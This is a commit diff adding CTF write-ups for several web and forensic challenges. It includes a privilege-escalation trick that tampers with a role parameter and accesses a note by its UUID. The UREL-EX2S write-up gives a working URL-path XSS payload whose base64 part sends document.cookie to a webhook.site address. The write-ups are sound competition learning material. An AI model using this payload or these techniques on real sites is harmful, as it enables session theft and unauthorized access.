feat: added CTF Secur{i}e The System

CTF Secur{i}e The System/Notes Manager/README.md

@@ -0,0 +1,33 @@
+# Notes Manager
+
+> You are a penetration tester hired by a small company who got their website hacked recently. They said the hacker somehow got administrative privilege to the website, but there were no logs indicated that an our main admin account was used in other IP Address else than our administrator IP Address. Can you help this company to find the vulnerabilities so that they can patch it ASAP?
+
+## About the Challenge
+We were given a website without a source code, and there are some functionality such as:
+* Register
+* Login
+* Setting acount
+* Create our note
+* See our note
+* Lock our note
+
+![flag](images/preview.png)
+
+## How to Solve?
+To obtain the flag, we need to first change our role from `user` to `admin` in the settings menu. (When I solved this challenge, the author accidentally added a `role` parameter to the account settings form)
+
+![form](images/form.png)
+
+After obtaining the `admin` role, we need to check the locked note that contains the flag.
+
+![flag-notes](images/flag-notes.png)
+
+We can bypass it by accessing the note directly (There is a note UUID in the body).
+
+![form](images/uuid.png)
+
+![flag](images/flag.png)
+
+```
+STS23{Bl4ckb0x_Ch4ll_F0r_An0th3r_D4y}
+```

CTF Secur{i}e The System/README.md

@@ -0,0 +1,10 @@
+# CTF Secur{i}e The System
+CTF writeup for The CTF Secur{i}e The System. I took part in this CTF competition with my friend (Duo) and secured the 7th place out of 40 teams
+
+| Category | Challenge |
+| --- | --- |
+| Forensic | [keylogger](/CTF%20Secur{i}e%20The%20System/keylogger/)
+| Forensic | [pemanasan](/CTF%20Secur{i}e%20The%20System/pemanasan/)
+| Forensic | [sloppy](/CTF%20Secur{i}e%20The%20System/sloppy/)
+| Web Exploitation | [Notes Manager](/CTF%20Secur{i}e%20The%20System/Notes%20Manager/)
+| Web Exploitation | [UREL-EX2S](/CTF%20Secur{i}e%20The%20System/UREL-EX2S/)

CTF Secur{i}e The System/UREL-EX2S/README.md

@@ -0,0 +1,40 @@
+# UREL-EX2S
+
+> Have you heard the exciting news? The little princess has just created a website for fellow GT fans to connect and chat! Before the official launch, we want to ensure a secure experience for everyone. Could you help us by testing it for potential XSS vulnerabilities? We want to make sure her fans don't encounter any issues with data security, especially from those pesky Android robots.
+
+## About the Challenge
+We were given a source code (You can download the source code [here](dist.zip)) and the website. The source code is actually quite simple; there's no crazy controller, complicated structure, etc.
+
+![preview](images/preview.png)
+
+## How to Solve?
+There's an interesting thing in the 404 page, when I input a random string in the URL (Ex: http://example/ddd). Our input reflected in the source code
+
+![404](images/404.png)
+
+I can close the tag by adding a quote in the url, and then I tried to use `<` and `>` to create a new HTML tag but the website encoded our input 
+
+![quote](images/quote.png)
+
+Because of the bot doesn't interact with the inputted url, We need to find a way to make the XSS payload executed without user interaction and I found this [tweet](https://twitter.com/RenwaX23/status/1122606900154130432)
+
+Yayyy, so I tried to create a XSS payload again based on the tweet above, and there's an alert xD
+
+![alert](images/alert.png)
+
+```
+http://app:8080/ddd'onfocus='alert(12)'name='jj#jj
+```
+
+More or less, the final payload looks like this
+```
+http://app:8080/ddd'style='x'onfocus='eval(atob(this.id))'id='d2luZG93LmxvY2F0aW9uLnJlcGxhY2UoJ2h0dHBzOi8vd2ViaG9vay5zaXRlLzU1YWY3MzI2LWI5OTYtNGNjYS05OWM1LWM3ZmMzYzNhN2Y4My8/Jytkb2N1bWVudC5jb29raWUp'name='jj#jj
+```
+
+Input the payload to the bot form, and then check webhook.site to get the flag
+
+![flag](images/flag.png)
+
+```
+STS23{xss_in_url_path!you_must_be_kidding_right?}
+```

CTF Secur{i}e The System/keylogger/README.md

@@ -0,0 +1,27 @@
+# keylogger
+
+> So, here's the thing. I just came to the Internet caffee (warnet) and after several minutes using the computer, I found a strange process running in the backround. Then i found out it was a keylogger. Luckily I can stop the process and don't let the attacker get this keylogger file. Because i just logged in to my server before.
+
+> flag = STS23{`<my server password>`}
+
+## About the Challenge
+We were given a pcapng file (You can downlod the file [here](log.pcapng)) and we need to find the flag inside this packet capture file
+
+![preview](images/preview.png)
+
+## How to Solve?
+Im using this [writeup](https://ctftime.org/writeup/27675) as a reference because they have the same solution method. First filter the data first to get the usbhid data
+
+```
+((usb.transfer_type == 0x01) && (frame.len == 35)) && !(usb.capdata == 00:00:00:00:00:00:00:00)
+```
+
+And then put this filter into this [repository](https://github.com/WangYihang/UsbKeyboardDataHacker) to convert the usbhid data into a character and voila!
+
+![flag](images/flag.png)
+
+> `<DEL>` means we need to delete the character
+
+```
+STS23{th1smys3cretp@ssw0rd}
+```

CTF Secur{i}e The System/pemanasan/README.md

@@ -0,0 +1,22 @@
+# pemanasan
+
+> Is that a `qrcode`? why is it so big?
+
+## About the Challenge
+We were given a rar file (You can downlod the file [here](pemanasan.rar)). Inside the file, there were 2 files which is `whatistheDIFFerent` (Contain the diff between the new qr and old qr image) and we got `qr.new`. If we parse the qr new we got `Lorem ipsum ....` string
+
+![preview](images/preview.png)
+
+## How to Solve?
+Use `patch` command and then parse the QR code again to obtain the flag
+
+```bash
+$ patch qr.new -i whatistheDIFFerent 
+patching file qr.new
+Reversed (or previously applied) patch detected!  Assume -R? [y] y
+```
+![flag](images/flag.png)
+
+```
+STS23{really_big_qr_isnt_it}
+```

CTF Secur{i}e The System/sloppy/README.md

@@ -0,0 +1,39 @@
+# sloppy
+
+> So, I found an USB in my class, I took it and I put it in my laptop. Then i found interesting anime (the anime is in mp4) and rar file and I copied it on my laptop. When i tried to open the file it showed pop up that my computer has been comprimized and my laptop restared after 1 minutes and I immediately remove all file that've been copied to my computer. As an engineer i always capture usb traffic using wireshark. Please help me to figure out what's happening in my laptop.
+
+> [download](https://drive.google.com/file/d/1JFQ2p1tRGp_s1rrHWX6glHP2r4nftjR7/view?usp=sharing)
+
+> wrap your flag with STS23{`<value>`}
+
+## About the Challenge
+We were given a pcapng file (You can download the file using the link above), and we need to find the flag inside the packet capture file
+
+![preview](images/preview.png)
+
+As you can see, there are USB and USBMS protocol in the packet capture file
+
+## How to Solve?
+As we can see, there are a loot of usbms protocol and the author mention about "rar" file. So im using this command to extract every file and then put it into a JSON file
+
+```bash
+tshark -T json -x -Y usbms -r chall.pcapng > usbms.json
+```
+
+And then I tried to find a rar file using `grep` command (Rar! == 52617221)
+
+```bash
+cat usbms.json | grep '"52617221'
+```
+
+Okay we found it, and then I submitted the hex code into CyberChef
+
+![Alt text](image.png)
+
+As you can see, there is a file with a `.bat` extension—hmm, weird. If you analyze the RAR file, this is the payload for `CVE-2023-38831`. And then I extracted the bat file and submitted into a sandbox malware online platform
+
+![Alt text](image-1.png)
+
+```
+STS23{C0mPrem1zed_d3sktop_h3h3}
+```

README.md

@@ -128,11 +128,16 @@ List of CTF events that i have joined before
 | NewportBlakeCTF 2023 | Yes | [Link](/NewportBlakeCTF%202023/) |
 | Hackappatoi CTF '23 | No | - |
 | pingCTF 2023 | Yes | [Link](/pingCTF%202023/) |
+| The Cyber Cooperative CTF | Yes | - |
+| BackdoorCTF 2023 | No | - |
+| 1st Annual TCM Invitational CTF | No | - |
+| niteCTF 2023 | Yes | - |
 
 ### Local Events
 | Event Name | Writeup Available? | Writeup Link |
 | ---------- | ------------------ | ------------ |
-| Cyber Jawara 2023 - Umum | No | [Link](/Cyber%20Jawara%202023%20-%20Umum/) |
+| CTF Secur{i}e The System | Yes | [Link](/CTF%20Secur{i}e%20The%20System/) |
+| Cyber Jawara 2023 - Umum | Yes | [Link](/Cyber%20Jawara%202023%20-%20Umum/) |
 | Information and Technology Festival 2023 | No | - |
 | 0ByteCTF 2023 | Yes | [Link](/0ByteCTF%202023/) |
 | N45HTCTF2023 2023 | No | - |